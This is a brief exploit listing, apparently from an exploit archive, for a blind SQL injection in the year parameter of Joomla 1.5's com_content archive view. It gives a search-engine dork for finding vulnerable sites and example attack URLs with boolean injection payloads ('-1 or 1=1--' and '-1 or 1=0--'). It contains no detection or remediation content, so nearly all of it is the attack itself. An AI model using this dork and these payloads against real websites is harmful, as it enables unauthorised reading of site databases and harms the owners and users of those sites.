# Exploit Title: Joomla com_content 1.5 - Blind SQL Vulnerability
# Date: 2020.05.02
# Author: Milad Karimi
# Software Link:
# Version: 1.5
# Category : webapps
# Tested on: windows 10 , firefox
# CVE : CWE-89
# Dork: inurl:index.php?option=com_content
index.php?option=com_content&view=archive&year=1 [BSQLI]
Example:
http://[site]/index.php?option=com_content&view=archive&year=1 [BSQLI]
http://[site]/index.php?option=com_content&view=archive&year=-1 or 1=1--
http://[site]/index.php?option=com_content&view=archive&year=-1 or 1=0--